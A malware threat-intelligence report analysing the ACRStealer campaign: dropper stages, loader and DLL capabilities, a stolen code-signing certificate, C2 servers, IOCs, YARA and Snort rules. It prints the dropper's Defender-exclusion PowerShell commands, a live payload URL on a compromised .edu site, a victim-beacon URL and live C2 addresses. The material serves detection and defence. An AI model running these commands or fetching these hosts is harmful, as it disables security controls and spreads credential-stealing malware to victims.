ACRStealer Dissected: Decrypted Kill Chain, Stolen ASUS EV Certificate, and 9 Live C2 Servers Operating a Multi-Family Stealer Network

TL;DR: ACRStealer (Arechclient2) is running an active credential theft operation with 9 live C2 servers, a compromised .edu WordPress site still hosting payloads, and a Go 1.26.0 loader with 7 obfuscated modules. We decrypted the XOR-encoded Config.ps1 dropper (key: MnZdJGRiwLze), revealing a 4-stage kill chain that abuses Windows Defender exclusions, sideloads DLLs capable of extracting Windows Hello NGC keys and Azure AD OAuth tokens, and signs payloads with a stolen ASUSTeK EV code signing certificate. The operation shares C2 infrastructure with SectopRAT, AmateraStealer, and NetSupport RAT.

---

The Decrypted Kill Chain

The investigation began with a XOR-encrypted PowerShell dropper (Config.ps1) recovered from a MalwareBazaar submission. The encryption is a 12-byte rotating XOR using key MnZdJGRiwLze (bytes: [77,110,90,100,74,71,82,105,119,76,122,101]). Decryption reveals a clean 4-stage infection chain.

Stage 1: Victim Fingerprinting

https://iplogger.co/1paLJ4

Before delivering any payload, the dropper beacons to iplogger.co with the victim's GUID, hostname ($env:COMPUTERNAME), username ($env:USERNAME), and timestamp. This is a filtering gate -- the operator uses it to identify high-value targets and discard sandboxes before committing the payload.

Stage 2: Defender Evasion

Add-MpPreference -ExclusionPath $env:TEMP
Add-MpPreference -ExclusionProcess "powershell.exe"

Two PowerShell commands add exclusions to Windows Defender: the user's %TEMP% directory (where the payload will land) and powershell.exe itself. This is T1562.001 (Impair Defenses: Disable or Modify Tools) -- simple, effective, and still surprisingly successful against default Windows configurations.

Stage 3: Payload Retrieval from Compromised .edu Site

https://acecareer.edu/wp-includes/certificates/acr-karimichikstrelyaet-639081475329349420.exe

The payload is hosted on ACE Career Education, a legitimate .edu institution running a compromised WordPress installation. The attacker buried the executable in /wp-includes/certificates/ -- a WordPress core directory that administrators rarely inspect and WAF rules typically whitelist.

The filename itself is operationally significant:

• acr -- ACRStealer identifier
• karimichikstrelyaet -- Russian transliteration of "каримичик стреляет" ("karimichik shoots"), confirming a Russian-speaking operator
• 639081475329349420 -- campaign or build identifier

This payload was still live and downloadable as of 2026-03-08.

Stage 4: Execution and Cleanup

The downloaded binary lands at %TEMP%\<random12chars>.exe, executes hidden (-WindowStyle Hidden), and self-deletes after a brief runtime. No persistence mechanism at this stage -- persistence is handled by the Go loader that executes next.

The Go Loader: "continental"

The Stage 3 payload retrieved from the compromised .edu site is a Go binary compiled with Go 1.26.0 (the latest release at time of analysis), indicating active development.

Property	Value
SHA-256	c2475b4b179267d3dd7f9c54d9e9f39b21109baa2c5d7e5acdc5e49d11bb1e95
Size	1,897,984 bytes
Type	PE32 (GUI) x86, Go binary
Go Version	1.26.0
Module Name	continental
Imphash	5af915f278815e76bad476ef32593028
Compile Timestamp	1970-01-01 (zeroed -- anti-forensic)
Last-Modified	2026-03-03
Source	Single main.go

Semantic Obfuscation

The loader uses 7 innocuously-named Go modules to disguise stealer functionality. The naming convention is deliberate -- a cursory inspection of exported symbols reveals nothing overtly malicious:

Module	Subfunctions	Assessed Purpose
main.Activities	10	Browser data theft (cookies, passwords, history)
main.Batteries	4	System information collection
main.Conversations	2	Messenger data extraction
main.Definitions	2	Config parsing / dead-drop C2 resolution
main.Happiness	3	Cryptocurrency wallet theft
main.Procurement	6	Credential harvesting
main.Supplements	4	Data exfiltration

Two additional single-use functions (main.Discussionsattraction, main.Nominationsconsensus) have no subfunctions and likely serve as initialization or orchestration routines.

Network Indicators in the Binary

• DNS resolvers hardcoded: 8.8.8.8, 1.1.1.1, 9.9.9.9 (bypasses corporate DNS for dead-drop resolution)
• Development IPs: 192.168.1.100-102 (operator's dev environment leaked in strings)
• Crypto API imports: CryptGenRandom, CertOpenSystemStore, CertEnumCertificatesInStore
• C2 URLs: Encrypted at rest -- not visible in plaintext strings

The verification.google DLL: Windows Hello and Azure AD Theft

The most technically sophisticated component is a DLL sideloaded as verification.google -- a filename chosen to look like a Google domain verification file. This DLL embeds 5 legitimate Microsoft system binaries as resources, each repurposed for credential theft:

Resource ID	Embedded DLL	Stealer Function
resource_120	sppc.dll	Windows license/activation data theft
resource_224	fwbase.dll	Firewall state manipulation
resource_561	fltLib.dll	Minifilter driver interaction (AV bypass)
resource_818	aclui.dll	ACL/security permission escalation
resource_921	ngc.dll	Windows Hello / NGC private key extraction

Credential Theft Capabilities

The DLL implements a comprehensive credential harvesting toolkit:

• ADAL/OAuth token theft -- intercepts Azure AD authentication tokens for login.microsoftonline.com, enabling cloud account takeover without password knowledge
• Smart card certificate enumeration -- enumerates certificates on attached smart card readers, targeting enterprise PKI environments
• Windows Hello / NGC key extraction -- extracts Next Generation Credential private keys, bypassing biometric and PIN-based authentication
• DPAPI decryption -- calls CryptUnprotectData to decrypt locally stored credentials protected by the Windows Data Protection API
• WinHTTP C2 communication -- uses the WinHTTP API for exfiltration, blending with legitimate Windows HTTP traffic

The DLL exports are obfuscated with generic names that mimic a legitimate SDK: AllocateNamespaceData, CreateNotificationEx, OpenSchemaAsync, ResetPropertiesEx, ValidateEndpointEx. Internally, the code uses VM-based obfuscation with a state machine driving execution flow through the exports.

Stolen ASUSTeK EV Code Signing Certificate

One distribution vector uses a stolen Extended Validation code signing certificate from ASUSTeK Computer Inc.

Property	Value
Subject	ASUSTeK COMPUTER INC.
Registry	#23638777, Taipei City
Issuer	DigiCert Trusted G4 Code Signing RSA4096 SHA384
Signed Binary	sunwukongs.exe
Disguise	ASUS AI Suite III
Registry Check	SOFTWARE\ASUS\AI-SUITE_II\
SHA-256	430b69b2268bb1f2f0821c8cf65d648917e1d13fd5c6f945b5830534e1d0e559

The binary sunwukongs.exe masquerades as ASUS AI Suite III and checks for the ASUS registry key to determine if it is running on a genuine ASUS system. The stolen EV certificate means the payload passes SmartScreen, most application whitelisting solutions, and default Authenticode verification -- it appears to be legitimately signed by one of the world's largest hardware manufacturers.

"Sun Wukong" (the Monkey King) is a character from Chinese mythology, though the Russian-language indicators elsewhere in the campaign suggest the operator is Russian-speaking, not Chinese.

DLL Sideloading Matrix

ACRStealer uses multiple DLL sideloading vectors to execute its payloads through legitimate binaries:

Sideloading DLL	Legitimate Host Binary	Observed Samples
python311.dll / python312.dll / python315.dll	Python interpreter	10+
wke.dll	Web toolkit engine	6
verification.google	Unknown	2
CrashRpt1403.dll	CrashRpt crash reporter	1

The Python DLL sideloading is the most prolific vector -- the operator bundles a legitimate Python interpreter with a malicious python3XX.dll that gets loaded before the real one. The progression from python311 to python315 tracks Python's release cycle, suggesting the operator updates the sideloading target with each new Python release to maximize compatibility.

Distribution Ecosystem

ACRStealer does not operate in isolation. It sits at the center of a multi-family distribution network with at least 6 distinct delivery mechanisms:

Delivery Method	Description
ClickFix / FakeCAPTCHA	Social engineering via fake CAPTCHA verification pages (March 2026 wave)
OffLoader	Secondary dropper; delivers sunwukongs.exe
HIjackLoader / IDATLoader	Loader chain for initial delivery
RenPyLoader	Novel loader disguised as Ren'Py game engine runtime
AsgardProtector	Fake security tool ("your PC is at risk")
AmateraStealer	Cross-family delivery partnership

The dead-drop C2 resolver is also noteworthy: ACRStealer resolves its actual C2 address by reading encoded strings from Steam Community profiles and Google user profiles -- a technique that makes the C2 address impossible to extract from the binary alone and trivial for the operator to rotate.

C2 Infrastructure: 18 IPs, 9 Live, 50% Churn

All live TLS-enabled C2 servers share an identical fingerprint:

• Self-signed TLS certificate with CN=<IP address> (not a domain)
• 1-year validity period, issued within days of deployment
• HTTP GET returns 405 Method Not Allowed
• HTTP POST returns 400 Bad Request (requires valid stealer beacon format)
• Single port: 443

Active C2 Servers (as of 2026-03-08)

IP	Cert Created	Tags	First Seen
212.118.41.180	2026-02-10	dllHijack	2026-02-20
193.33.195.37	2026-02-20	--	2026-02-22
46.149.72.66	2026-03-03	acecareer-edu	2026-03-07
46.149.72.226	2026-03-05	dllHijack	2026-03-07
77.91.96.209	2026-03-05	RenPyLoader	2026-03-07
45.150.34.0	2026-03-06	OffLoader	2026-03-07
94.26.106.216	--	SectopRAT (no TLS)	2026-03-07
91.84.123.250	--	SectopRAT (no TLS)	2026-03-07
116.203.167.195	--	ClickFix, NetSupport (no TLS)	2026-03-01

Dead C2 Servers

IP	Tags	First Seen
212.34.155.34	OffLoader	2026-02-07
144.124.236.99	dllHijack	2026-02-13
144.124.233.47	dllHijack	2026-02-20
146.103.103.78	OffLoader	2026-02-22
144.124.246.132	AsgardProtector	2026-02-24
146.103.104.188	dllHijack	2026-03-01
185.121.235.118	ClickFix, AmateraStealer	2026-03-01
77.238.228.60	ClickFix, FakeCaptcha	2026-03-01
89.110.118.6	AmateraStealer	2026-03-05

Infrastructure Observations

• 50% churn rate -- 9 of 18 known IPs are already dead, indicating rapid rotation on roughly 2-week cycles
• Multi-provider hosting -- IPs spread across many ASNs with no single bulletproof host, making ASN-level blocking ineffective
• 3 non-TLS C2s -- 91.84.123.250, 94.26.106.216, 116.203.167.195 lack TLS and may run a different C2 panel variant
• Certificate pattern -- self-signed, CN=<IP>, 1-year validity, created 1-3 days before first observed sample tagging

Cross-Family Infrastructure Overlap

Shared C2 infrastructure reveals operational relationships between multiple malware families:

Family	Relationship	Shared Infrastructure
SectopRAT / Arechclient2	Same operator	94.26.106.216, 91.84.123.250
AmateraStealer	Distribution partner	89.110.118.6, 185.121.235.118
ClickFix / FakeCAPTCHA	Delivery vector	Multiple samples via fake CAPTCHA pages
HIjackLoader / IDATLoader	Loader chain	Used for initial delivery
OffLoader	Dropper	Drops sunwukongs.exe
Vidar	Same campaign	Co-distributed via groveri.eu lures
NetSupport RAT	Co-delivered	Shared ClickFix infrastructure (116.203.167.195)

The SectopRAT overlap is the strongest signal -- SectopRAT is the .NET variant of the same Arechclient2 family, and the shared C2 IPs confirm a single operator running both the Go-based ACRStealer and the .NET-based SectopRAT from the same infrastructure.

MITRE ATT&CK Mapping

Tactic	Technique	ID	Implementation
Resource Development	Compromise Infrastructure	T1584.004	Compromised acecareer.edu WordPress for payload hosting
Resource Development	Code Signing Certificates	T1588.003	Stolen ASUSTeK EV certificate
Initial Access	Phishing	T1566	ClickFix/FakeCAPTCHA social engineering
Execution	User Execution: Malicious File	T1204.002	Fake CAPTCHA triggers PowerShell execution
Execution	Command and Scripting Interpreter: PowerShell	T1059.001	Config.ps1 dropper
Persistence	Hijack Execution Flow: DLL Side-Loading	T1574.002	python3XX.dll, wke.dll, verification.google, CrashRpt1403.dll
Defense Evasion	Impair Defenses: Disable or Modify Tools	T1562.001	Defender exclusion for %TEMP% and powershell.exe
Defense Evasion	Subvert Trust Controls: Code Signing	T1553.002	Stolen ASUSTeK EV cert passes SmartScreen
Defense Evasion	Obfuscated Files or Information	T1027	XOR-encrypted Config.ps1, VM-obfuscated DLL
Defense Evasion	Indicator Removal: File Deletion	T1070.004	Payload self-deletes after execution
Credential Access	Credentials from Password Stores	T1555	DPAPI decryption via CryptUnprotectData
Credential Access	Credentials from Web Browsers	T1555.003	Browser credential, cookie, history theft
Credential Access	Steal Application Access Token	T1528	ADAL/OAuth token theft (Azure AD)
Credential Access	Steal Web Session Cookie	T1539	Browser session cookie extraction
Credential Access	Unsecured Credentials	T1552	Windows Hello NGC key extraction
Discovery	System Information Discovery	T1082	main.Batteries module, iplogger.co beacon
Collection	Data from Local System	T1005	Smart card cert enumeration, wallet data
Command and Control	Web Service: Dead Drop Resolver	T1102.001	Steam Community / Google profile C2 resolution
Command and Control	Encrypted Channel	T1573	Self-signed TLS to C2 servers
Command and Control	Application Layer Protocol: Web	T1071.001	HTTPS POST exfiltration
Exfiltration	Exfiltration Over C2 Channel	T1041	Stolen data exfiltrated via same HTTPS channel

Indicators of Compromise

C2 IPs -- Live

45.150.34.0
46.149.72.66
46.149.72.226
77.91.96.209
91.84.123.250
94.26.106.216
116.203.167.195
193.33.195.37
212.118.41.180

C2 IPs -- Dead (historical)

77.238.228.60
89.110.118.6
144.124.233.47
144.124.236.99
144.124.246.132
146.103.103.78
146.103.104.188
185.121.235.118
212.34.155.34

URLs

https://iplogger.co/1paLJ4
https://acecareer.edu/wp-includes/certificates/acr-karimichikstrelyaet-639081475329349420.exe

File Indicators

Filename	SHA-256	Description
Go Loader (continental)	c2475b4b179267d3dd7f9c54d9e9f39b21109baa2c5d7e5acdc5e49d11bb1e95	Stage 3 payload, Go 1.26.0
verification.google	4df58b7e964f595fbdd1a345ea8a42d7477a473527174eb07aba7a236369933b	Sideloaded DLL with NGC/ADAL theft
sunwukongs.exe	430b69b2268bb1f2f0821c8cf65d648917e1d13fd5c6f945b5830534e1d0e559	Stolen ASUSTeK EV-signed binary

Encryption

Config.ps1 XOR key: MnZdJGRiwLze (12-byte rotating)
Key bytes: [77, 110, 90, 100, 74, 71, 82, 105, 119, 76, 122, 101]

YARA Detection Opportunities

rule ACRStealer_Go_Loader_Continental {
    meta:
        description = "Detects ACRStealer Go loader with 'continental' module name"
        author = "Breakglass Intelligence"
        date = "2026-03-08"
        tlp = "TLP:CLEAR"
        severity = "HIGH"
        reference = "https://intel.breakglass.tech"
    strings:
        $module = "continental" ascii
        $go_ver = "go1.26" ascii
        $fn1 = "main.Activities" ascii
        $fn2 = "main.Batteries" ascii
        $fn3 = "main.Conversations" ascii
        $fn4 = "main.Definitions" ascii
        $fn5 = "main.Happiness" ascii
        $fn6 = "main.Procurement" ascii
        $fn7 = "main.Supplements" ascii
        $disc = "main.Discussionsattraction" ascii
        $nom = "main.Nominationsconsensus" ascii
    condition:
        uint16(0) == 0x5A4D and
        $module and $go_ver and
        4 of ($fn*)
}

rule ACRStealer_Verification_Google_DLL {
    meta:
        description = "Detects ACRStealer verification.google DLL with embedded Microsoft binaries"
        author = "Breakglass Intelligence"
        date = "2026-03-08"
        tlp = "TLP:CLEAR"
        severity = "HIGH"
    strings:
        $exp1 = "AllocateNamespaceData" ascii
        $exp2 = "CreateNotificationEx" ascii
        $exp3 = "OpenSchemaAsync" ascii
        $exp4 = "ResetPropertiesEx" ascii
        $exp5 = "ValidateEndpointEx" ascii
        $res1 = "sppc.dll" ascii wide
        $res2 = "ngc.dll" ascii wide
        $res3 = "fltLib.dll" ascii wide
        $res4 = "aclui.dll" ascii wide
    condition:
        uint16(0) == 0x5A4D and
        3 of ($exp*) and
        2 of ($res*)
}

rule ACRStealer_Config_PS1_XOR {
    meta:
        description = "Detects ACRStealer XOR-encrypted PowerShell dropper"
        author = "Breakglass Intelligence"
        date = "2026-03-08"
        tlp = "TLP:CLEAR"
    strings:
        $xor_key = { 4D 6E 5A 64 4A 47 52 69 77 4C 7A 65 }
        $defender1 = "Add-MpPreference" ascii wide nocase
        $defender2 = "-ExclusionPath" ascii wide nocase
        $defender3 = "-ExclusionProcess" ascii wide nocase
        $iplogger = "iplogger.co" ascii wide
    condition:
        $xor_key or
        (2 of ($defender*) and $iplogger)
}

Network Detection -- Snort/Suricata

# ACRStealer C2 — Self-signed cert with CN=IP pattern (common across all live servers)
alert tls any any -> [45.150.34.0,46.149.72.66,46.149.72.226,77.91.96.209,193.33.195.37,212.118.41.180] 443 \
  (msg:"ACRSTEALER C2 Self-Signed Cert CN=IP"; tls.cert_subject; content:"CN="; \
  flow:established,to_server; sid:2026030801; rev:1;)

# ACRStealer — Compromised .edu payload delivery
alert http any any -> any any (msg:"ACRSTEALER Payload Download from Compromised EDU"; \
  content:"acecareer.edu"; http_host; content:"/wp-includes/certificates/"; http_uri; \
  sid:2026030802; rev:1;)

# ACRStealer — iplogger.co victim beacon
alert http any any -> any any (msg:"ACRSTEALER Victim Beacon to iplogger"; \
  content:"iplogger.co"; http_host; content:"/1paLJ4"; http_uri; \
  sid:2026030803; rev:1;)

# ACRStealer — Defender exclusion via PowerShell (host-based)
alert any any any -> any any (msg:"ACRSTEALER Defender Exclusion PowerShell"; \
  content:"Add-MpPreference"; content:"-ExclusionPath"; content:"TEMP"; \
  sid:2026030804; rev:1;)

---

Published by Breakglass Intelligence. Investigation conducted 2026-03-08. 50 MalwareBazaar samples analyzed. 9 live C2 servers confirmed. Compromised .edu payload host still active. Classification: TLP:CLEAR